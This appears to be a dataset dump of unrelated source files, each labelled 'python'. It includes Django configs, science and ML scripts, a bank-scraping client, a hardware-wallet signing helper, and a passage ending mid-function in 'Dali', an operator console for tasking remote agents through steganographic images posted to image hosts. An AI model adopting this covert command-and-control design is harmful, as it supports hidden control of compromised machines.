content
stringlengths
0
894k
type
stringclasses
2 values
"""bis URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/3.0/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.contrib import admin from django.urls import path, include from django.conf.urls.static import static from django.conf import settings from django.contrib.auth import views as auth_views from ajax_select import urls as ajax_select_urls from .apps.accounts.urls import UserLogin urlpatterns = [ path('', UserLogin.as_view(), name='root'), # Start Custom Apps # Accounts app path('', include(('bis.apps.accounts.urls', 'users'), namespace='users')), # Gepian Dashboard app path('', include(('bis.apps.gepiandashboard.urls', 'gepian'), namespace='gepian')), # Incubator app path('', include(('bis.apps.incubator.urls', 'incubator'), namespace='incubator')), # End Custom Apps # Admin panel path('admin/', admin.site.urls), # Password recovery path('password_reset/done/', auth_views.PasswordResetDoneView.as_view(), name='password_reset_done'), path('reset/done/', auth_views.PasswordResetCompleteView.as_view(), name='password_reset_complete'), # Ajax Select path('ajax_select/', include(ajax_select_urls)), ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
python
Desc = cellDescClass("CLKBUFX16") Desc.properties["cell_leakage_power"] = "5029.443900" Desc.properties["cell_footprint"] = "clkbuf" Desc.properties["area"] = "63.201600" Desc.pinOrder = ['A', 'Y'] Desc.add_arc("A","Y","combi") Desc.set_job("buf") # A Desc.add_param("area",63.201600); Desc.add_pin("A","input") Desc.add_pin("Y","output") Desc.add_pin_func("Y","unknown") CellLib["CLKBUFX16"]=Desc
python
{ "targets": [{ "target_name": "jimp-native", "cflags": ["-fexceptions"], "cflags!": [ "-fno-exceptions" ], "cflags_cc": [ "-std=c++17", "-fexceptions" ], "cflags_cc!": [ "-fno-exceptions" ], 'defines': ['_HAS_EXCEPTIONS=1'], "sources": [ "<!@(node gyp-source-loader.js)" ], 'include_dirs': [ "<!@(node -p \"require('node-addon-api').include.replace(/(\s+)/g, '\\\\\$1')\")", ], 'libraries': [], 'dependencies': [ "<!(node -p \"require('node-addon-api').gyp.replace(/(\s+)/g, '\\\\\$1')\")" ], 'msvs_settings': { 'VCCLCompilerTool': { 'ExceptionHandling': 1, 'AdditionalOptions': ['-std:c++17'] }, }, }] }
python
#!/usr/bin/python3 import matplotlib.pyplot as plt import logging import math from tgblib import util from tgblib.data import get_data, get_data_ul logging.getLogger().setLevel(logging.INFO) if __name__ == '__main__': util.set_my_fonts(mode='talk') show = False label = 'std' NU_TITLE = { 0: 'Nu1a', 1: 'Nu1b', 2: 'Nu2a', 3: 'none', 4: 'Nu2b' } VTS_TITLE = { 0: 'with GT corrections', 1: 'without GT corrections', 2: 'Ve2a', 3: 'Ve2b', 4: 'Ve2c' } MARKERS = { 0: 'o', 1: 's', 2: 'o', 3: 's', 4: '*' } COLORS = { 0: 'k', 1: 'r', 2: 'k', 3: 'r', 4: 'b' } MINOR_TICK = 7.5 MAJOR_TICK = 12 # 2017 fluxes = dict() for iper in [0, 1]: fluxes[iper] = dict() plt.figure(figsize=(8, 6), tight_layout=True) ax = plt.gca() ax.set_yscale('log') ax.set_xscale('log') ax.set_title('Nov. 2017' if iper == 0 else 'Dec. 2017') ax.set_ylabel(r'$E^2\;\mathrm{d}N/\mathrm{d}E\;[\mathrm{erg\;s^{-1}\;cm^{-2}}]$') ax.set_xlabel(r'$E\;[\mathrm{keV}]$') ax.tick_params(which='minor', length=MINOR_TICK) ax.tick_params(which='major', length=MAJOR_TICK) for nn, gt in enumerate([True, False]): vtsEnergy, vtsFlux, vtsFluxErr = get_data(iper, onlyVTS=True, GT=gt) vtsEnergyUL, vtsFluxUL = get_data_ul(iper, GT=gt) ax.errorbar( [e * (1 + 0.02 * nn) for e in vtsEnergy], vtsFlux, yerr=vtsFluxErr, color=COLORS[nn], linestyle='none', label=VTS_TITLE[nn], marker=MARKERS[nn] ) if len(vtsEnergyUL) > 0: vtsFluxErrUL = [p - pow(10, math.log10(p) - 0.1) for p in vtsFluxUL] ax.errorbar( vtsEnergyUL, vtsFluxUL, yerr=vtsFluxErrUL, uplims=True, color=COLORS[nn], linestyle='none', marker=MARKERS[nn] ) fluxes[iper][nn] = vtsFlux ax.set_ylim(0.8e-13, 5e-12) ax.set_xlim(1e8, 2e10) myTicks = [1e8, 1e9, 1e10] myLabels = [r'$10^{8}$', r'$10^{9}$', r'$10^{10}$'] ax.set_xticks(myTicks) ax.set_xticklabels(myLabels) ax.legend(loc='best', frameon=False) figName = 'figures/DataVTS_GTcomparison_{}'.format(iper) plt.savefig(figName + '.png', format='png', bbox_inches='tight') plt.savefig(figName + '.pdf', format='pdf', bbox_inches='tight') # Calculating ratios for iper in [0, 1]: nn = 3 if iper == 0 else 2 for ii in range(nn): print(ii) a = fluxes[iper][0][ii] b = fluxes[iper][1][ii + 1] ratio = (a - b) / (a + b) / 2 print(ratio)
python
def mandel(x, y, max_iters, value): """ Given the real and imaginary parts of a complex number, determine if it is a candidate for membership in the Mandelbrot set given a fixed number of iterations. """ i = 0 c = complex(x,y) z = 0.0j for i in range(max_iters): z = z*z + c if (z.real*z.real + z.imag*z.imag) >= 4: value[0] = i return 0 value[i] = 255 return 1
python
# -*- coding: utf-8 -*- import os def get_list(path): j=0 f = open('cemianTrain.txt','w') for i in os.listdir(path): print(i) f.write(os.path.join('/',i)) j+=1 if j%2 == 0: f.write('\n') else: f.write(' ') f.close() def get_list1(path): f = open('holderTrain.txt','w') for i in os.listdir(path): if i.split('_')[-1] == 'label.png': pass else: f.write(os.path.join('/',i)) f.write(' ') f.write(os.path.join('/',i.split('.')[0]+'_label.png')) f.write('\n') f.close() get_list1('holder/')
python
from core import RunBossSpider from data.tool.handler import HandlerData from flask import Flask def run_proxy(): pass def run_web(): app = Flask(__name__) @app.route('/') def index(): return 'Hello World' app.run() def main(): # 开启爬虫 boss_spi = RunBossSpider() boss_spi.run() # 开启数据分析 hd = HandlerData('../../data/') hd.run() if __name__ == '__main__': # run_proxy() # main() run_web()
python
import csv from django.db.models import Q from django.http import HttpResponse from django.template import Context, loader from django.template.loader import get_template from pymedtermino.umls import * from weasyprint import HTML from modules.cnmb.models import Physic from modules.cnmb.utils.dto import CnmbDto from modules.umls.utils.dto import ConceptDTO, DataUmls, DataCsv, Relation from modules.umls.views import connect_to_umls def generate_data_cnmb(): query_physics = Physic.objects.using('cnmb').order_by('name') physic_list = [] codes = read_codes_cnmb() list_by_csv = [] cnmb_list = [] for code in codes: list_by_csv = query_physics.filter( Q(group__code=code) | Q(name__istartswith=code) | Q( group__parent__code=code) | Q( group__parent__parent__code=code) | Q( group__parent__parent__parent__code=code) | Q( group__parent__parent__parent__parent__code=code) | Q( group__parent__parent__parent__parent__parent__code=code) | Q( group__parent__parent__parent__parent__parent__code=code)).all() physic_list.extend(list_by_csv) for physic in physic_list: cnmb_dto = CnmbDto() cnmb_dto.physic = physic cnmb_dto.care_level_one = physic.cares.filter(level='I').first() cnmb_dto.care_level_second = physic.cares.filter(level='II').first() cnmb_dto.care_level_third = physic.cares.filter(level='III').first() cnmb_list.append(cnmb_dto) return cnmb_list def generate_report_cnmb(request): print (request.GET) if 'button-print-pdf' in request.GET.keys(): return report_cnmb_pdf(request) else: return report_cnmb_txt(request) def report_cnmb_pdf(request): cnmb_list = generate_data_cnmb() html_template = get_template('search_cnmb.html').render( {'title': 'Resultados de Búsqueda', 'object_list': cnmb_list}) pdf_file = HTML(string=html_template).write_pdf() http_response = HttpResponse(pdf_file, content_type='application/pdf') return http_response def generate_data_umls(): data_csv_list = read_codes_umls() connect_to_umls() list_umls_cui = [] concepts = [] for data_csv in data_csv_list: umls_cui = UMLS_CUI(data_csv.code) umls = DataUmls() umls.umls = umls_cui umls.term = data_csv.name list_umls_cui.append(umls) codes_list = [data.code for data in data_csv_list] for umls_cui in list_umls_cui: for el in ['may_be_treated_by', 'may_be_prevented_by', 'may_be_diagnosed_by', 'may_treat', 'may_prevent', 'may_diagnose']: if (el in umls_cui.umls.relations): for relations in getattr(umls_cui.umls, el): if relations.code.upper() in codes_list: concept = ConceptDTO() concept.relation = Relation() concept.code = umls_cui.umls.code concept.term = umls_cui.umls.term concept.original_terminologies = ' '.join( list(umls_cui.umls.original_terminologies)) concept.relation.term = relations.term concept.terminology = umls_cui.umls.terminology.name concept.term_umls = umls_cui.term concept.relation_selected = el concept.relation.code = relations.code concepts.append(concept) return concepts def generate_report_umls(request): if 'button-print-pdf' in request.GET.keys(): return report_umls_pdf(request) else: return report_umls_txt(request) def report_umls_pdf(request): concepts = generate_data_umls() html_template = get_template('search_umls.html') html = html_template.render( {'title': 'Resultados de Búsqueda', 'object_list': concepts}) pdf_file = HTML(string=html).write_pdf() response = HttpResponse(pdf_file, content_type='application/pdf') response['Content-Disposition'] = 'filename="results.pdf"' return response def read_codes_umls(): """ Este método permite almacenar los codigos umls que estań en el archivo csv :return: """ codes_list = [] with open('codes_umls.csv', mode='r') as csv_file: csv_reader = csv.DictReader(csv_file, delimiter=';') for row in csv_reader: if 'CUI' in row and 'NAME' in row: data = DataCsv() data.code = row['CUI'].upper() data.name = row['NAME'] codes_list.append(data) return codes_list def read_codes_cnmb(): """ Este método permite almacenar los codigos de los medicamentos cnmb que estań en el archivo csv :return: """ codes_list = [] with open('codes_cnmb.csv', mode='r') as csv_file: csv_reader = csv.DictReader(csv_file, delimiter=';') for row in csv_reader: if 'code' in row: codes_list.append(row['code']) return codes_list def report_umls_txt(request): concepts = generate_data_umls() response = HttpResponse(content_type='text/csv') response['Content-Disposition'] = 'attachment; filename="results_umls.txt"' writer = csv.writer(response) writer.writerow( ['Codigo', 'TerminoUml', 'Termino', 'Relacion', 'CodigoRelacion', 'TerminoRelacion', 'Terminologia']) for concept in concepts: writer.writerow( [concept.code, concept.term_umls, concept.term, concept.relation_selected, concept.relation.code, concept.relation.term, concept.original_terminologies]) return response def report_cnmb_txt(request): cnmb_list = generate_data_cnmb() response = HttpResponse(content_type='text/csv') response['Content-Disposition'] = 'attachment; filename="results_cnmb.txt"' writer = csv.writer(response) writer.writerow( ['Codigo', 'Descripcion', 'FormaFarmaceutica', 'Concentracion', 'NivelPrescripcion', 'NivelAtencionI', 'NivelAtencionII', 'NivelAtencionIII', '2N', 'Descripcion2N', '1N', 'Descripcion1N']) for cnmb in cnmb_list: one_level = 'Si' if cnmb.care_level_one is not None else 'No' sec_level = 'Si' if cnmb.care_level_second is not None else 'No' third_level = 'Si' if cnmb.care_level_third is not None else 'No' writer.writerow( [cnmb.physic.group.code, cnmb.physic.name, cnmb.physic.pharmaceuticalform, '', cnmb.physic.prescription_level.level, one_level, sec_level, third_level, cnmb.physic.group.parent.parent.parent.code, cnmb.physic.group.parent.parent.parent.name, cnmb.physic.group.parent.parent.parent.parent.code if cnmb.physic.group.parent.parent.parent.parent is not None else '', cnmb.physic.group.parent.parent.parent.parent.name if cnmb.physic.group.parent.parent.parent.parent is not None else '']) return response
python
from setuptools import setup, find_packages version = '1.0.0' setup( name="alerta-query", version=version, description='Alerta Generic Webhook by query parameters', url='https://github.com/alerta/alerta-contrib', license='MIT', author='Pablo Villaverde', author_email='[email protected]', packages=find_packages(), py_modules=['alerta_query'], install_requires=[], include_package_data=True, zip_safe=True, entry_points={ 'alerta.webhooks': [ 'query = alerta_query:QueryWebhook' ] } )
python
import requests from bs4 import BeautifulSoup import re from datetime import datetime from base_bank import BankBase import unicodedata class Bank(BankBase): def __init__(self): BankBase.__init__(self) self._bank_session = requests.Session() self._base_url = 'https://online.bbt.com' self._auth_url = '/auth/pwd.tb' def authenticate(self, username, password): request_payload = {'BrowserDetective': 'General Inquiry', 'var_field': '', 'UserName': username, 'inq': 'O', 'Password': password} auth_request = self._bank_session.post(self._base_url + self._auth_url, data=request_payload) return auth_request.text def navigate(self, homepage): home_soup = BeautifulSoup(homepage) accounts = [] # parse credit card accounts for link in home_soup.find_all(href=re.compile('/olbsys/bbtolbext/bankcards/+')): if link.div is not None: type_and_lastno = link.div.contents[0].strip().rsplit(None, 1) account = { 'url': link.get('href'), 'type': type_and_lastno[0], 'lastno': type_and_lastno[1], 'amount': link.div.h3.get_text().strip() + ' ' + link.div.span.get_text() } accounts.append(account) print('\nYou have ' + str(len(accounts)) + ' account options.\n') for index, account in enumerate(accounts): print('Option [' + str(index) + '] is a ' + account['type'] + ' account ending in '\ + account['lastno'] + ' with a balance of $' + account['amount']) input_account = raw_input('\nChoose an account: ') self._bank_session.get((self._base_url + accounts[int(input_account)]['url'])) cc_loan_params = { 'action': 'managePostedTransactions', 'flag': '3D', 'rand': str(datetime.utcnow()), 'resetForm': 'true' } cc_loan_table = self._bank_session.get('https://online.bbt.com/olbsys/bbtolbext/bankcards/manageDetails', params=cc_loan_params) return accounts[int(input_account)], cc_loan_table.text def parse(self, account, account_text): account_soup = BeautifulSoup(account_text) account_headers = [] account_transactions = [] for header in account_soup.table.thead.tr.find_all('th'): account_headers.append(header.get_text()) account_transactions.append(account_headers) for row in account_soup.table.tbody.find_all('tr'): transaction_row = [row.th.get_text()] for table_data in row.find_all('td'): raw_table_data = unicodedata.normalize('NFKC', table_data.get_text()) transaction_row.append(' '.join(raw_table_data.strip().split())) account_transactions.append(transaction_row) return account, account_transactions
python
from btchippython.btchip.bitcoinTransaction import bitcoinTransaction from btchippython.btchip.btchip import btchip from electrum_clone.electrumravencoin.electrum.transaction import Transaction from electrum_clone.electrumravencoin.electrum.util import bfh from electrum_clone.electrumravencoin.electrum.ravencoin import int_to_hex, var_int def sign_transaction(cmd, tx, pubkeys, inputsPaths, changePath): inputs = [] chipInputs = [] redeemScripts = [] output = None p2shTransaction = False segwitTransaction = False pin = "" # Fetch inputs of the transaction to sign for i, txin in enumerate(tx.inputs()): redeemScript = Transaction.get_preimage_script(txin) print("REDEEM SCRIPT: {}".format(redeemScript)) txin_prev_tx = txin.utxo txin_prev_tx_raw = txin_prev_tx.serialize() if txin_prev_tx else None inputs.append([txin_prev_tx_raw, txin.prevout.out_idx, redeemScript, txin.prevout.txid.hex(), pubkeys[i], txin.nsequence, txin.value_sats()]) txOutput = var_int(len(tx.outputs())) for o in tx.outputs(): txOutput += int_to_hex(0 if o.asset else o.value.value, 8) script = o.scriptpubkey.hex() txOutput += var_int(len(script) // 2) txOutput += script txOutput = bfh(txOutput) for utxo in inputs: sequence = int_to_hex(utxo[5], 4) txtmp = bitcoinTransaction(bfh(utxo[0])) trustedInput = btchip.getTrustedInput(cmd, txtmp, utxo[1]) trustedInput['sequence'] = sequence chipInputs.append(trustedInput) print("REDEEM SCRIPT 2: {}".format(txtmp.outputs[utxo[1]].script)) redeemScripts.append(txtmp.outputs[utxo[1]].script) print("INPUTS: {}".format(inputs)) # Sign all inputs firstTransaction = True inputIndex = 0 rawTx = tx.serialize_to_network() btchip.enableAlternate2fa(cmd, False) while inputIndex < len(inputs): print('SIGNING: {}'.format(redeemScripts[inputIndex])) btchip.startUntrustedTransaction(cmd, firstTransaction, inputIndex, chipInputs, redeemScripts[inputIndex], version=tx.version) # we don't set meaningful outputAddress, amount and fees # as we only care about the alternateEncoding==True branch outputData = btchip.finalizeInput(cmd, b'', 0, 0, changePath, bfh(rawTx)) outputData['outputData'] = txOutput if outputData['confirmationNeeded']: outputData['address'] = output else: # Sign input with the provided PIN inputSignature = btchip.untrustedHashSign(cmd, inputsPaths[inputIndex], pin, lockTime=tx.locktime) inputSignature[0] = 0x30 # force for 1.4.9+ my_pubkey = inputs[inputIndex][4] tx.add_signature_to_txin(txin_idx=inputIndex, signing_pubkey=my_pubkey.hex(), sig=inputSignature.hex()) inputIndex = inputIndex + 1 firstTransaction = False
python
#!/usr/bin/env python3 # python 3.5 without f strings import argparse import os, shutil, sys import uuid import itertools from glob import glob from snakemake.shell import shell from snakemake.io import glob_wildcards from multiprocessing import Pool def predict_genes(genome,fasta,out_dir,log): fna = "{}/{}.fna".format(out_dir,genome) faa = "{}/{}.faa".format(out_dir,genome) gff = "{}/{}.gff".format(out_dir,genome) shell('printf "{genome}:\n" > {log}'.format(genome=genome,log=log)) shell("prodigal -i {fasta} -o {gff} -d {fna} -a {faa} -p sinlge -c -m -f gff 2>> {log} ".format( fasta=fasta, log=log,gff=gff,fna=fna,faa=faa) ) shell('printf "\n" >> {log}'.format(log=log)) def predict_genes_genomes(input_dir,out_dir,log,threads): genomes_fastas = glob(os.path.join(input_dir,"*.fasta")) os.makedirs(out_dir,exist_ok=True) temp_log_dir = os.path.join(os.path.dirname(log), "tmp_" + uuid.uuid4().hex) os.makedirs(temp_log_dir, exist_ok=False) genome_names = [] log_names = [] for fasta in genomes_fastas: genome_name = os.path.splitext(os.path.split(fasta)[-1])[0] genome_names.append(genome_name) log_names.append(os.path.join(temp_log_dir, genome_name + '.prodigal.tmp')) pool = Pool(threads) pool.starmap(predict_genes, zip(genome_names,genomes_fastas, itertools.repeat(out_dir),log_names)) #cat in python with open(log, 'ab') as f_out: for logfile in log_names: with open(logfile,'rb') as f_in: shutil.copyfileobj(f_in, f_out) shell("rm -r {temp_log_dir}".format(temp_log_dir=temp_log_dir)) if __name__ == "__main__": try: log=open(snakemake.log[0],"w") sys.stderr= log sys.stdout= log predict_genes_genomes( snakemake.input.dir, snakemake.output[0], snakemake.log[0], int(snakemake.threads) ) except NameError: p = argparse.ArgumentParser() p.add_argument("--input-dir", required = True) p.add_argument("--out-dir", required = True) p.add_argument("--log", required = True) p.add_argument("--threads", required = False, default = 1, type = int) args = vars(p.parse_args()) predict_genes_genomes(**args)
python
"""The genome to be evolved.""" import random import logging import hashlib import copy from train import train_and_score from train import trainsimulation class Genome(): """ Represents one genome and all relevant utility functions (add, mutate, etc.). """ def __init__( self, all_possible_genes = None, geneparam = {}, u_ID = 0, mom_ID = 0, dad_ID = 0, gen = 0 ): """Initialize a genome. Args: all_possible_genes (dict): Parameters for the genome, includes: gene_nb_neurons_i (list): [64, 128, 256] for (i=1,...,6) gene_nb_layers (list): [1, 2, 3, 4] gene_activation (list): ['relu', 'elu'] gene_optimizer (list): ['rmsprop', 'adam'] """ self.accuracy = 0.0 self.all_possible_genes = all_possible_genes self.geneparam = geneparam #(dict): represents actual genome parameters self.u_ID = u_ID self.parents = [mom_ID, dad_ID] self.generation = gen self.numero = 0 #hash only makes sense when we have specified the genes if not geneparam: self.hash = 0 else: self.update_hash() def update_hash(self): """ Refesh each genome's unique hash - needs to run after any genome changes. """ genh = str(self.nb_neurons()) + self.geneparam['activation'] \ + str(self.geneparam['nb_layers']) + self.geneparam['optimizer'] self.hash = hashlib.md5(genh.encode("UTF-8")).hexdigest() self.accuracy = 0.0 def set_genes_random(self): """Create a random genome.""" #print("set_genes_random") self.parents = [0,0] #very sad - no parents :( for key in self.all_possible_genes: self.geneparam[key] = random.choice(self.all_possible_genes[key]) self.update_hash() def mutate_one_gene(self): """Randomly mutate one gene in the genome. Args: network (dict): The genome parameters to mutate Returns: (Genome): A randomly mutated genome object """ # Which gene shall we mutate? Choose one of N possible keys/genes. gene_to_mutate = random.choice( list(self.all_possible_genes.keys()) ) # And then let's mutate one of the genes. # Make sure that this actually creates mutation current_value = self.geneparam[gene_to_mutate] possible_choices = copy.deepcopy(self.all_possible_genes[gene_to_mutate]) possible_choices.remove(current_value) self.geneparam[gene_to_mutate] = random.choice( possible_choices ) self.update_hash() def set_generation(self, generation): """needed when a genome is passed on from one generation to the next. the id stays the same, but the generation is increased""" self.generation = generation #logging.info("Setting Generation to %d" % self.generation) def set_genes_to(self, geneparam, mom_ID, dad_ID): """Set genome properties. this is used when breeding kids Args: genome (dict): The genome parameters IMPROVE """ self.parents = [mom_ID, dad_ID] self.geneparam = geneparam self.update_hash() def trainsimulate(self, trainingset): """Train the genome and record the accuracy. Args: dataset (str): Name of dataset to use. """ return trainsimulation(self, trainingset) def train(self, trainingset, numero): """Train the genome and record the accuracy. Args: dataset (str): Name of dataset to use. """ #if self.accuracy == 0.0: #don't bother retraining ones we already trained # self.accuracy = train_and_score(self, trainingset, numero) # self.numero = numero def seterror(self, erro): """Train the genome and record the accuracy. Args: dataset (str): Name of dataset to use. """ if self.accuracy == 0.0: self.accuracy = erro def print_genome(self): """Print out a genome.""" logging.info("------------GENOMA-------------") self.print_geneparam() logging.info("Acc: %f" % self.accuracy) logging.info("UniID: %d" % self.u_ID) logging.info("Mom and Dad: %d %d" % (self.parents[0], self.parents[1])) logging.info("Gen: %d" % self.generation) logging.info("Hash: %s" % self.hash) logging.info("Numero modelo h5: %d" % self.numero) def print_genome_ma(self): """Print out a genome.""" self.print_geneparam() logging.info("Acc: %.2f%% UniID: %d Mom and Dad: %d %d Gen: %d" % (self.accuracy * 100, self.u_ID, self.parents[0], self.parents[1], self.generation)) logging.info("Hash: %s" % self.hash) # print nb_neurons as single list def print_geneparam(self): g = self.geneparam.copy() nb_neurons = self.nb_neurons() for i in range(1,7): g.pop('nb_neurons_' + str(i)) # replace individual layer numbers with single list g['nb_neurons'] = nb_neurons logging.info(g) # convert nb_neurons_i at each layer to a single list def nb_neurons(self): nb_neurons = [None] * 6 for i in range(0,6): nb_neurons[i] = self.geneparam['nb_neurons_' + str(i+1)] return nb_neurons
python
#!/usr/bin/python import pickle import numpy numpy.random.seed(42) ### The words (features) and authors (labels), already largely processed. ### These files should have been created from the previous (Lesson 10) ### mini-project. words_file = "../text_learning/your_word_data.pkl" authors_file = "../text_learning/your_email_authors.pkl" word_data = pickle.load( open(words_file, "rb")) authors = pickle.load( open(authors_file, "rb") ) ### test_size is the percentage of events assigned to the test set (the ### remainder go into training) ### feature matrices changed to dense representations for compatibility with ### classifier functions in versions 0.15.2 and earlier from sklearn import model_selection features_train, features_test, labels_train, labels_test = model_selection.train_test_split(word_data, authors, test_size=0.1, random_state=42) from sklearn.feature_extraction.text import TfidfVectorizer vectorizer = TfidfVectorizer(sublinear_tf=True, max_df=0.5, stop_words='english') features_train = vectorizer.fit_transform(features_train) features_test = vectorizer.transform(features_test).toarray() ### a classic way to overfit is to use a small number ### of data points and a large number of features; ### train on only 150 events to put ourselves in this regime features_train = features_train[:150].toarray() labels_train = labels_train[:150] ### your code goes here #Calculating Decision Tree Accuracy - Assuming Overfitting will happen when trained on only 150 training points from sklearn.tree import DecisionTreeClassifier from sklearn.metrics import accuracy_score clf = DecisionTreeClassifier() clf.fit(features_train, labels_train) pred = clf.predict(features_test) acc = accuracy_score(pred, labels_test) print("Accuracy:",acc) # What’s the importance of the most important feature? What is the number of this feature? importances = clf.feature_importances_ for index, item in enumerate(importances): if item > 0.2: print (index, item) import numpy as np indices = np.argsort(importances)[::-1] print('Feature Ranking: ') for i in range(10): print("{} feature no. {} ({})".format(i+1, indices[i], importances[indices[i]])) #Result # 33614 (0.7647058823529412) # What’s the most powerful word when your decision tree is makeing its classification decisions? print(vectorizer.get_feature_names()[33614]) #Result # sshacklensf #Outlier after removing "sshacklensf" outlier print(vectorizer.get_feature_names()[14343]) #Result #cgermannsf #Outlier after removing "cgermannsf" outlier print(vectorizer.get_feature_names()[21323]) #Result #houectect
python
#!/usr/bin/env python3 from PIL import Image import requests from io import BytesIO import base64 import os import sys from Crypto.Cipher import AES from colorama import * import random import json import mysql.connector from cmd import Cmd import hashlib import time # these dicts are how we manage options settings for the various modules like: Image, Album, Task, Agent create_options = {'Command': '', 'Response (No,Short,Long)': '', 'Base-Image': '', 'New-Filename': ''} album_options = {'Auth-Type': '', 'Title': ''} tasking_options = {'Tasking-Image': '', 'Title': '', 'Tags': '', 'Agent': '', 'Bearer-Token': ''} agent_options = {'Title': '', 'Tags': ''} # some nice hex ascii art thats not really ascii art at all ?? def ascii(): print("\n") print(Style.BRIGHT + Fore.YELLOW + " ~64 61 6C 69~" + Style.RESET_ALL) print("\n") # attempt to connect to MySQL, will fail if: # 1. MySQL is not running or 2. MySQL hasn't been configured for credentialed login by users # sets up the database 'dali', creates all tables with relevant columns # then exports the database connection for other functions to use def mysql_check(): try: mydb = mysql.connector.connect(host = 'localhost', user = 'root', password = 'root') mycursor = mydb.cursor() except mysql.connector.Error as err: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) try: mycursor.execute("CREATE DATABASE dali") except mysql.connector.Error as err: if err.errno != 1007: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) try: mycursor.execute("USE dali") except mysql.connector.Error as err: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) try: mycursor.execute("CREATE TABLE Pictures (ID INT AUTO_INCREMENT PRIMARY KEY, md5 VARCHAR(255), filename VARCHAR(255), command VARCHAR(1000), response VARCHAR(255), token VARCHAR(255), album_deletehash VARCHAR(255))") except mysql.connector.Error as err: if err.errno != 1050: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) try: mycursor.execute("CREATE TABLE Albums (ID INT AUTO_INCREMENT PRIMARY KEY, Album_Hash VARCHAR(255), Delete_Hash VARCHAR(255), Auth_Type VARCHAR(255), Token VARCHAR(255))") except mysql.connector.Error as err: if err.errno != 1050: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) try: mycursor.execute("CREATE TABLE Tasking (Tasking_Image VARCHAR(255), Tasking_Command VARCHAR(255), Response TEXT, Title VARCHAR(255), Tags VARCHAR(255), Agent VARCHAR(255), Image_Hash VARCHAR(255), Delete_Hash VARCHAR(255), Token VARCHAR(255))") except mysql.connector.Error as err: if err.errno != 1050: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) try: mycursor.execute("CREATE TABLE Agents (ID INT AUTO_INCREMENT PRIMARY KEY, Status VARCHAR(255), Title VARCHAR(255), Tags VARCHAR(255))") except mysql.connector.Error as err: if err.errno != 1050: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) mycursor.close() return mydb # bare-bones implementation of this awesome class. TODO: add auto-complete # this just gives us a nice CLI for our program class MyPrompt(Cmd): prompt = Style.BRIGHT + Fore.MAGENTA + "Dali> " + Style.RESET_ALL def do_help(self, inp): print("\n") print("Valid Commands:\t\tDescription:") print("Image\t\t\tCreate an image for agent tasking") print("Album\t\t\tCreate an album for agent responses") print("Agent\t\t\tCreate an agent entity") print("Task\t\t\tCreate tasking for agent") print("List\t\t\tList images, albums, agents, and tasks") print("Delete\t\t\tDelete images, albums, agents, and tasks") print("Response\t\tRetrieve responses from tasked agents") print("Exit/Quit\t\tExit program") print("\n") def default(self, inp): print("\n") print("Valid Commands:\t\tDescription:") print("Image\t\t\tCreate an image for agent tasking") print("Album\t\t\tCreate an album for agent responses") print("Agent\t\t\tCreate an agent entity") print("Task\t\t\tCreate tasking for agent") print("List\t\t\tList images, albums, agents, and tasks") print("Delete\t\t\tDelete images, albums, agents, and tasks") print("Response\t\tRetrieve responses from tasked agents") print("Exit/Quit\t\tExit program") print("\n") def do_Exit(self, inp): sys.exit(0) def do_exit(self, inp): sys.exit(0) def do_Quit(self, inp): sys.exit(0) def do_quit(self, inp): sys.exit(0) def do_Image(self, inp): self.do_image(inp) # this creates our stego'd image with the appropriate options set def do_image(self, inp): while True: inn = input(Style.BRIGHT + Fore.MAGENTA + "Dali/Image> " + Style.RESET_ALL).lower().split() if 'options' in inn: print('\n---OPTIONS---') for key, value in create_options.items(): if value == '': print(Style.BRIGHT + Fore.CYAN + key + Style.RESET_ALL, ': None') else: print(Style.BRIGHT + Fore.CYAN + key + Style.RESET_ALL, ':', value) print("\n") elif ('exit' in inn) or ('quit' in inn) or ('cd ..' in inn): break elif inn[0] == 'set': # get input for the command we want to encode into the image if inn[1] == 'command': create_options['Command'] = " ".join(inn[2:]) # get input for whether or not we expect agent to respond elif inn[1] == 'response': try: if inn[2][0] == 's': create_options['Response (No,Short,Long)'] = 'Short' create_options['Client-ID'] = '' create_options['Album-ID'] = '' if 'Bearer-Token' in create_options: del create_options['Bearer-Token'] elif inn[2][0] == 'n': create_options['Response (No,Short,Long)'] = 'No' if 'Client-ID' in create_options: del create_options['Client-ID'] if 'Album-ID' in create_options: del create_options['Album-ID'] if 'Bearer-Token' in create_options: del create_options['Bearer-Token'] elif inn[2][0] == 'l': create_options['Response (No,Short,Long)'] = 'Long' create_options['Bearer-Token'] = '' create_options['Album-ID'] = '' if 'Client-ID' in create_options: del create_options['Client-ID'] except: self.print_valid_commands() # get input for which image we want to edit elif inn[1] == 'base-image': try: create_options['Base-Image'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['base', 'image']: try: create_options['Base-Image'] = inn[3] except: self.print_valid_commands() # get input for where will save stego'd image elif inn[1] == 'new-filename': try: create_options['New-Filename'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['new', 'filename']: try: create_options['New-Filename'] = inn[3] except: self.print_valid_commands() elif inn[1] == 'client-id': try: create_options['Client-ID'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['client', 'id']: try: create_options['Client-ID'] = inn[3] except: self.print_valid_commands() elif inn[1] == 'album-id': try: create_options['Album-ID'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['album', 'id']: try: create_options['Album-ID'] = inn[3] except: self.print_valid_commands() elif inn[1] == 'bearer-token': try: create_options['Bearer-Token'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['bearer', 'token']: try: create_options['Bearer-Token'] = inn[3] except: self.print_valid_commands() # give user option to reset values for options elif inn[0] == 'reset': create_options['Command'] = '' create_options['Response (No,Short,Long)'] = '' create_options['Base-Image'] = '' create_options['New-Filename'] = '' if 'Client-ID' in create_options: del create_options['Client-ID'] del create_options['Album-ID'] elif 'Bearer-Token' in create_options: del create_options['Bearer-Token'] del create_options['Album-ID'] # make sure all variables have been set, then export those to those to the functions elif inn[0] == 'go': 